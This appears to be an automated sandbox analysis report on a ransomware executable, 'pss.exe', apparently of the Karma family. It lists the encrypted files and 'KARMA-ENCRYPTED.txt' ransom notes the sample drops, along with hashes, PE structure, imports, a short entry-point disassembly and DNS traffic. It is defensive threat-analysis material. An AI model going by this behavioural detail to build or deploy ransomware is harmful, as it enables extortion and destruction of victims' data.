SSDEEP:24:p5NeCU9ZellXhfa0RON16zityxrA9yFzyqdlxqfTk9G6xaBFh8XeQfK:lJUnGbfbQWOu0CWWlxqrk91xKL83i
MD5:0AD8C0A21411886F6A039D6FA22D8B24
SHA1:82D453B2C5D36F597491A80AB25D694C53AD763F
SHA-256:3B45A80C51D699A4D75089D0103CEEC50A60F580EDA60A891F31A5608CEC6C37
SHA-512:FE0E5F969D671C9C24FE6C7863BC35644732077BC135C23DC019A71781CDA7F7CD0D766EEFF86E9F8BEC8B7B8E3DE418367A3DCF18F070DD39E0703CA9853F30
Malicious:false
C:\Users\user\Downloads\BNAGMGSPLO.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81284245460368
Encrypted:false
SSDEEP:24:sTNyGquO8mM0PjnFG9nonYyWqwtGGbQzG/QSz9Uom7YMYw:W4uOg0eFqwrn/Qg9q73
MD5:7ABB55513973EEF9C6FE7051FDE2CD72
SHA1:01C7F9ACF20AAA847B8BFD795543E46F113F89C3
SHA-256:AD90946F5CCD84818257FA598A10E2263DD2329E9B792A1018B113A36D29B5DD
SHA-512:FB2A22E857A1F3C6A04F8909B8D311CE73A25FCE798C9CAE6E20B7CA9CAA82D19A6F31F4F108BE4C5CB0AC4DF32F2BE0E9CDFD2FCC33CD94C83DAB6F28261BEE
Malicious:false
C:\Users\user\Downloads\BNAGMGSPLO.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.851850114234256
Encrypted:false
SSDEEP:24:/LrIVgADmvqWN4KBwVYjjtqaM1x7xFPsx0wvdozI8+wa:Trc44KBwVYj5U1RPavGz3g
MD5:0C009BF92371C3E64F9DCEB4EE37C524
SHA1:2A112878005FE01A389D737745FF8D30BF599A3F
SHA-256:E5266C20F1B7410B18FC54924BC80DB588861A5D4FAEDC0D90B4E212E085F8A3
SHA-512:D925AB67B09EDF9966A792C0CE247E9E63CC9305961AB32121611E4AB2782630CC05DCBAF06A18DDFA20F5AEB7789DEC559AD8275A345C3E1FCEE2998F76BDDF
Malicious:false
C:\Users\user\Downloads\EEGWXUHVUG.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.840201262589571
Encrypted:false
SSDEEP:24:PTvXies9I0SSgaQqhLUlXvUObKyGDyFw7ljiKs7bgN/Q:7yewrSZaUVvGVDyu7FiKsvC/Q
MD5:7762601B8C810D88740782756F94116E
SHA1:2A6B27A9D790520F7AF9FB7A8B660738671AEBF9
SHA-256:0638FFAB2E85DD8EA7BF3EA4282FF77B0C87A0D8D465A206AA4ACF0C32FBC47C
SHA-512:A3AEC0320FAB2F515F210025EA118CD862473740412A4499CF23DECA0213769BC75D13F3E9F54A475721F591B256069185BBEFC1E2A4E6B0BF4DC42C00E67139
Malicious:false
C:\Users\user\Downloads\EFOYFBOLXA.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.826497789071994
Encrypted:false
SSDEEP:24:BQXsPHdhz4w4TTe1CtIisksICMmWfyBnSit30I7Qh:e+4TTTe4tIDk9CjWfyBSit34
MD5:93929BA2C827B99CC4EF642DCCE4055E
SHA1:C01C2794B841E3C1DDCF0F6E499280598C9887A5
SHA-256:3D0D7CCD2F69B136D36C3E2A8C2CDADBD3D519D885C3DBA6EF459668A23CA347
SHA-512:809C46F361129210861F394C0C5E0EB806A34EFE4B3F61B3F60E6E8AE0FC52BB94DE25E5EEFFF9BFB30124E81E7021E90AE76A32A855B6A0934EB1F2CD1DC092
Malicious:false
C:\Users\user\Downloads\EOWRVPQCCS.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.836894358080607
Encrypted:false
SSDEEP:24:J66iCkPfgTbT+nf6XbAd94/t8nB3Nn2pQpPMucbn:J1Tk3iXbAb0KJRMucb
MD5:7584833BADBE3A0056938470E2B6094E
SHA1:0D168714AB9B8C10B28CA878FC9E9684B6770D71
SHA-256:CEA087A1DEEA14C97D9D9236E430B99DB398A69F57B792386952177A0F84E646
SHA-512:002A2EE47189D7FB14EECCD86E2F69B22C6F20074478A399DCF4A198FC1BD7565D12DCEFC3F5676252A41360B2D03455157CDEE60B2B5181F30CDE7E0F9CD94F
Malicious:false
C:\Users\user\Downloads\EWZCVGNOWT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.813700938199611
Encrypted:false
SSDEEP:24:wjjbnBQHKU1oxpkpGUSSo28Nn4S6trwxVVtKO5GQJ108nE8Z/n:mvBQeSr8FI07VtKOwQpd9n
MD5:F75780716C030640E3D69A906F81D02A
SHA1:28AD1E628E486F0847042190520B452C17BE1E28
SHA-256:CA19B44953E34C0D15BB2753CB42D1B19C957A1DCED52FEDCBFB7787C4A69017
SHA-512:87347EA34B43550F1DC5D188DA52C6F9A0976A7052FE7EE7803907A264BB2FF93C7E986E75C654480948F12E8259C59FBBABBA021D68721F1B6128C33A3188A0
Malicious:false
C:\Users\user\Downloads\GAOBCVIQIJ.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819531832052393
Encrypted:false
SSDEEP:24:qO2f7Q4FCFSFo5nz1oBO0geWj2OSoe9Dep:r2f7QlSOSVgV27oeJep
MD5:4B3A77FD6F64EA2D52A174F2F9234B25
SHA1:1B32EF66ED0A90D319DF97FA3D9122E6DB1127A9
SHA-256:750300689B8EC77436461C628E9CBE0C6562FE93711C88CE71D11ABE1828B308
SHA-512:DDBF8E0E2374EA85324D3A31A1E05AFE635DE0090BFE5F54382178548D33C7FBDA391C6679B665B09E48FF836BC53F3E31B838FCE58C5A59DAAF90B19AE40344
Malicious:false
C:\Users\user\Downloads\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Downloads\NVWZAPQSQL.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.823312150124047
Encrypted:false
SSDEEP:24:dBwOgv4J9eboIqV9j19c7lD03p+Ddl5TyVOFQDrAQqZjzijkGO4lb:HwOQenj1GlD0Z+X5TyVOFQDrXCa3O4J
MD5:A332AAFA835AB972B577AF88E80620E6
SHA1:0ADC96942ED6F66981B9976D69E9064A71946C97
SHA-256:17788D77E9DDF79DE5BE84BAE00154521394BC8DF9383D1072093BC494524750
SHA-512:C9DFA0736B0EF07D8FA8883E4237992CCDC19EF5DB55D21BB680C04F153205E176B5E99F87DFBBA663EAF99D808142454ACB29D46F6AD242141C3F4593907B15
Malicious:false
C:\Users\user\Downloads\PIVFAGEAAV.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.818448776663923
Encrypted:false
SSDEEP:24:55HZnV/5zDCvl/L6bHP5Npdd9vViZHVLMDi7xNh3PFwONnCk9RoEQo:555HaFL6bHP5NpVu1MoxNxF58o
MD5:BE5F06A51A2601F1D3477FAC6185815D
SHA1:00EAE340570F09B513439AC811F2E3AD52B7F2E0
SHA-256:944986A226F5B3081A7DD5D7B3583935ABB27B853E23085627B6CAC605D1B782
SHA-512:4B0755A4BC2FED0D6ABB17158F55205034B86C4914BE38BD2CDE111D5A38FF8FAE2617D962B0834EF876F35E5AFABB1F2D8F5566C2FDFCE715DF3BA9EDDE9368
Malicious:false
C:\Users\user\Downloads\PWCCAWLGRE.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.841143929859832
Encrypted:false
SSDEEP:24:aGSkg5iVPLAHfpIiOUhziETRn8u8c37ARqPR+HGeZMpFBZ2F9:a3OA/JOUhD5PAu+HGeqpnIF9
MD5:D46A6E9F9F7FA409B6C4DA4B03496D3A
SHA1:E4F3A65805A7FA5BD9659F7086230C11399BCF61
SHA-256:7E25A9536048F1F2ABCCD67113164379295A36522A299921BDF2690B38C32F17
SHA-512:5A7EEEB6F729C64848130B760B7A7AF8F49AD137E287F9DA94372CE2E510973136756D97C3A78F8A3044056515D4EC1262B6FAC391A34C6D4DBDD6EA5FA15E5B
Malicious:false
C:\Users\user\Downloads\PWCCAWLGRE.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.816065564803297
Encrypted:false
SSDEEP:24:f6J79gXrOc0bhIkKR8VJhUBtv7vuGP/XfpA5aT8nK9CxyKtNZpLKR:fGgbOs4Qtv77P/fpEaTj+Nt1E
MD5:781365153DF3C3016458644F53D3FC60
SHA1:45DDE3D366F2F6E074E857A34BF16B65FF989D8E
SHA-256:07433B072CEFC7E8BAF7DE4A02097879A8DA21EDC06AD5D1D1B253E7B7F04425
SHA-512:D08AED813271F1C9AC3E3B50A8FA57F5E5D784BDD6386CD149A6A89A466CF61EF447D159CF2815308E8FEA09F50D962D6477CC3D1969AC8B417884DBBB1B8C15
Malicious:false
C:\Users\user\Downloads\QCFWYSKMHA.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.810397506908055
Encrypted:false
SSDEEP:24:uwty4xyCtvc6GOnbdjvhbkj4jvLZp7WnS3pk+hEHaFdAtx:TXxyYvcSbdjvh4j4jvg8pdhEHaFdAtx
MD5:D3E065E36B769B39F7373F6C2BEA1F58
SHA1:86248099E8E14C0512C35B7301B8B56D8F09F9BA
SHA-256:1A23EB9B8422ED0337E6148447A9FD24E6B4F4FA14DA1206E6214F0AEA009844
SHA-512:3D32D6372F8D63705A15FED33BAE85B0D40A8F84AE1526B6A7B513A0AC56A3F6A3B5B87786ECCB556B2196F21CF6567433C502170B7A8EAEDE51146372414487
Malicious:false
C:\Users\user\Downloads\QCFWYSKMHA.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.835493741139947
Encrypted:false
SSDEEP:24:ndV6oFMlzzTa6LozG9fmwRND/qifqhDzKMjnKh:vMlL7cXwnImyI
MD5:5540AE67DC608B71D03501EBC4D02F26
SHA1:4F8F9DB7221B0466D7679C90C9408F5413B89EB9
SHA-256:F5E0BD32FE2F8B5ED0DEDCC58E730C2DCB7F45D27AEADB379A6149793C2C9445
SHA-512:0F80A3E50E7C1B960D84CAB00D676A7B742D3C9A3758ED2288DC135697B73CDF6962B845B3E920FDE4EE5DC25069FA0E84A068AE507FBA8C70C3EAC27FBD090D
Malicious:false
C:\Users\user\Downloads\QNCYCDFIJJ.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.804702290356976
Encrypted:false
SSDEEP:24:nGQNthQQdYnZsfylxrcCv75zEzFV4Jzfm86y9WFw5ObR:vNPpehd75zEJyJzfRr90w5Od
MD5:7569FAD3A9E5F3E3E7D9796CAB4E559E
SHA1:498BCBC52E4C4D3ECB0546A94AF0366905DCAC9D
SHA-256:5C51714A2E62FD53C60E1AEC743D3DD18EA26ACEDA19BA98EDAB9780EA3C6F2D
SHA-512:E698AB725C540043A0A3613AF4D7C6E7224C67FF74C62B484B2A181ED56EA2250F6A8D20ED3027B4C84DD6DC47DDD4DC8EC1D4841830A0400FB0ECD3CD846B47
Malicious:false
C:\Users\user\Downloads\SUAVTZKNFL.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819881850037968
Encrypted:false
SSDEEP:24:JenOriYL4UOgUECt/IYVtzkBSe79vUXYmQ4JiutHHzCYIXUbwQUu9:YOnLGP/DMaYmziu1zCNXUPX9
MD5:7D5D6349078AF3D48CFB8FDFA864D762
SHA1:FD24369A2A8ED088BA7D0BF85D8975B9AE3CEE64
SHA-256:BFAF42EB7B5FB395A162C359F012C987E761029A95B8F31D495C33AE3F1D2A61
SHA-512:45A861E7A0541A53DD02494B48792DFCFEF57514AA18E4F45CF68926FD20E1D1FBE0579C3120A5D6E4573DA16C389D66B45BBFE7210281E6B1B25070D9B5C407
Malicious:false
C:\Users\user\Downloads\SUAVTZKNFL.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.835811565860034
Encrypted:false
SSDEEP:24:V1Ls12JzawKjQFxcUR6YrQvNCS7oLGjHAxUOK4iVwvNNiX:V1LX+kxc4KNxwGjlikwVNM
MD5:ABB83A271D244C6A0FE3FA248507B939
SHA1:25E5682EDF7F498EF6DE78D93F7FDF2CB7B86C34
SHA-256:02D35019B907AD429C9261B3C77101224C341D0A639B21F1FDE61423B1F81DA1
SHA-512:2A22AD9CC67692F1599B61A3483F5466F393CFAE0A9C69B686D3A61C98ED40AF686B245D1444E5763A40E861BD00B3330EA97FB628D08EAAD492E604926E3A3A
Malicious:false
C:\Users\user\Favorites\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Favorites\Links\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
C:\Users\user\Links\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Music\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Pictures\Camera Roll\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Pictures\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Videos\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\bootTel.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):149
Entropy (8bit):6.559411725000434
Encrypted:false
SSDEEP:3:lCz7J/7ecncMusTWDllKbudX4oSwbkHSRhwLCIkNAn:sh7L4D/pX41wAHS6SA
MD5:21DA043152AF5C37C9A0CEE3D8BE54E3
SHA1:0B219524456E38CA98016527BA74AC524CEEC9DB
SHA-256:22016881962DD540274D9365CE515AE89857BD6D7D8252AA9FDF20B002511CBB
SHA-512:AF15C753E2BA518691021C4415991CE28A6F18AB3EE258F4A254D6DFDAC0981B4CF4021B4BAC490B36E7894FD7D9FE9941F619ED2E4F2EFEE6F0CF83C52C9DC2
Malicious:false
Preview: ...?....;.....9......O..".'y.....]....$...s+N.g .FjjI..rY.....KARMA=..f.l.}........*.r...[D.M.P.g.K......A.....Y8p,!.M@.)Z...G..p..(..$X...%
C:\bootTel.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):149
Entropy (8bit):6.559411725000434
Encrypted:false
SSDEEP:3:lCz7J/7ecncMusTWDllKbudX4oSwbkHSRhwLCIkNAn:sh7L4D/pX41wAHS6SA
MD5:21DA043152AF5C37C9A0CEE3D8BE54E3
SHA1:0B219524456E38CA98016527BA74AC524CEEC9DB
SHA-256:22016881962DD540274D9365CE515AE89857BD6D7D8252AA9FDF20B002511CBB
SHA-512:AF15C753E2BA518691021C4415991CE28A6F18AB3EE258F4A254D6DFDAC0981B4CF4021B4BAC490B36E7894FD7D9FE9941F619ED2E4F2EFEE6F0CF83C52C9DC2
Malicious:false
Preview: ...?....;.....9......O..".'y.....]....$...s+N.g .FjjI..rY.....KARMA=..f.l.}........*.r...[D.M.P.g.K......A.....Y8p,!.M@.)Z...G..p..(..$X...%

Static File Info

General

File type:PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):5.836333489480476
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:pss.exe
File size:18944
MD5:56700917a7434e307531195e4102d7bf
SHA1:b396affd40f38c5be6ec2fc18550bbfc913fc7ea
SHA256:3ff1b90dbad5d78397fdc731c3a3c080d91fc488ac9152793b538b74a1e2d8f3
SHA512:0e232d8f5aa8d1581feb4c51ba835f014ed019bf0f91f87b49155dea52184cee57636997416d045eb6021c5628c0e37f508a7714f2502ea273d052027603616d
SSDEEP:384:f1zXE8oZBhh1z9gN4cZTQQk2f6wYZ1FLzutLjKHpQHoCMBzXcxfwy98jf8EY8eML:f1A8IBDUBtBWJQH78eMT3
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............kO..kO..kO..jN..kO..jO..kOu.hN..kO].bN..kO].iN..kORich..kO........PE..L...q..`.................,..........p........@....@

File Icon

Icon Hash:00828e8e8686b000

General

Entrypoint:0x401b70
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows cui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:0x60D60B71 [Fri Jun 25 16:59:29 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:600ef9c591d4987fe4f2cf55157c3925
Instruction
push ebp
mov ebp, esp
lea edx, dword ptr [ebp-0000020Ch]
mov eax, 00404180h
sub eax, edx
lea ecx, dword ptr [ebp-0000020Ch]
sub esp, 0000020Ch
sar eax, 1
sub ecx, 02h
inc eax
push esi
lea edx, dword ptr [eax+eax]
movzx eax, word ptr [edx+ecx]
lea ecx, dword ptr [ecx+02h]
mov word ptr [ecx], ax
test ax, ax
jne 00007FAC0498B113h
lea ecx, dword ptr [ebp-0000020Ch]
mov edx, 00404368h
movzx eax, word ptr [ecx]
add ecx, 02h
test ax, ax
jne 00007FAC0498B117h
sub ecx, 04h
nop
movzx eax, word ptr [edx]
lea ecx, dword ptr [ecx+02h]
mov word ptr [ecx], ax
lea edx, dword ptr [edx+02h]
test ax, ax
jne 00007FAC0498B111h
xor eax, eax
cmp word ptr [ebp-0000020Ch], ax
je 00007FAC0498B132h
nop dword ptr [eax+00h]
inc eax
cmp word ptr [ebp+eax*2-0000020Ch], 0000h
jne 00007FAC0498B116h
push 00000000h
push 00000000h
push eax
lea eax, dword ptr [ebp-0000020Ch]
push eax
push FFFFFFF5h
call dword ptr [004040A0h]
push eax
call dword ptr [0040403Ch]
push 0040436Ch
push 00000000h
push 00000000h
call dword ptr [00404094h]
call dword ptr [00404088h]
cmp eax, 000000B7h
je 00007FAC0498B1ECh
call 00007FAC0498B779h
xor edx, edx
mov dword ptr [00406000h], eax
mov ecx, 004041C8h
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x545c           0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x5360           0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x4000           0xd0          .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x2b2d        0x2c00    False     0.508345170455   data       6.37784567801  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x4000           0x189e        0x1a00    False     0.416466346154   data       4.18177599378  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x6000           0x1c          0x0       False     0                empty      0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

| DLL | Import |
| --- | --- |
| KERNEL32.dll | WriteConsoleW, GetProcAddress, GetProcessHeap, ReadFile, FindFirstFileW, GetFileSizeEx, SetLastError, HeapAlloc, FindClose, WaitForSingleObject, Sleep, CreateThread, SetFilePointerEx, MoveFileW, GetDriveTypeW, LoadLibraryW, CloseHandle, GlobalAlloc, LoadLibraryA, GetLastError, GetFileAttributesW, CreateFileW, CreateMutexA, GetTempPathW, WriteFile, GetStdHandle, HeapFree, ExitProcess, FindNextFileW, GetCommandLineW |
| USER32.dll | DrawTextW, SystemParametersInfoW, ReleaseDC, GetSystemMetrics, GetDC |
| GDI32.dll | GetPixel, DeleteDC, GetTextExtentPoint32W, SetTextColor, SetBkMode, SetBkColor, DeleteObject, CreateFontW, SetPixel, CreateCompatibleDC, CreateDIBSection, SelectObject, CreateCompatibleBitmap, BitBlt |

Network Behavior

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- |
| Aug 19, 2021 06:00:42.755122900 CEST | 58643 | 53 | 192.168.2.3 | 8.8.8.8 |
| Aug 19, 2021 06:00:42.788742065 CEST | 53 | 58643 | 8.8.8.8 | 192.168.2.3 |
| Aug 19, 2021 06:00:42.920614958 CEST | 60985 | 53 | 192.168.2.3 | 8.8.8.8 |
| Aug 19, 2021 06:00:42.969479084 CEST | 53 | 60985 | 8.8.8.8 | 192.168.2.3 |
| Aug 19, 2021 06:00:46.852415085 CEST | 50200 | 53 | 192.168.2.3 | 8.8.8.8 |
| Aug 19, 2021 06:00:46.890532017 CEST | 53 | 50200 | 8.8.8.8 | 192.168.2.3 |
| Aug 19, 2021 06:00:57.799537897 CEST | 51281 | 53 | 192.168.2.3 | 8.8.8.8 |
| Aug 19, 2021 06:00:57.824424028 CEST | 53 | 51281 | 8.8.8.8 | 192.168.2.3 |

Code Manipulations

Statistics

[Figure: CPU Usage over time (s)]

[Figure: Memory Usage (MB) over time (s)]

[Figure: High Level Behavior Distribution (File, Registry)]

Behavior

System Behavior

Start time: 06:00:48
Start date: 19/08/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
